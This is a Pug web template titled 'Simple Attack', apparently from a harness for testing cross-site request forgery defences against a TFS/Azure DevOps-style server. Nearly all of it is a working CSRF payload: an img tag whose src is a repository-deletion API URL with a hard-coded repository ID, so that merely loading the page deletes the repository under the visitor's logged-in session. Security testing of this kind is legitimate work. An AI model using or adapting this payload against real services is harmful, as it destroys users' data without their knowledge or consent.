extends layout

block content
  include partials/attacknav
  script(src='/js/lib/jquery-3.1.1.min.js')
  script(src='/js/simple-attack.js')
  .page-header
    h3 Simple Attack

  h2 Some dummy content
  div.csrfContainer hello 
  -
    var deleteRepoWithId = "1a21de9c-0430-4fb9-b740-d859d25e5c9a";
    var repoDeletionUrl = "https://verify.me.tfsallin.net:444/_apis/git/Repositories2/{repoId}?deleteRepositoryId={repoId}";
    repoDeletionUrl=repoDeletionUrl.replace(/{repoId}/g, deleteRepoWithId);
  img.csrf-image(src=repoDeletionUrl)
  






  